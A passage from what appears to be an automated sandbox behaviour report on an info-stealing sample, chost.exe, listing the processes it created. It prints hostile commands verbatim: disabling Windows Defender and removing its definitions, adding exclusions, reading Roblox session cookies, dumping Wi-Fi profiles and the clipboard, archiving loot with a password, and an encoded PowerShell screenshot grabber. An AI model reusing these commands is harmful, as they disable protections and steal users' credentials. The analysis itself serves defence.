HQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1CC2.tmp" "c:\Users\user\AppData\Local\Temp\4z11l1tq\CSC8AFA9231FD50466BA346A9DBA2A34956.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chost.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaa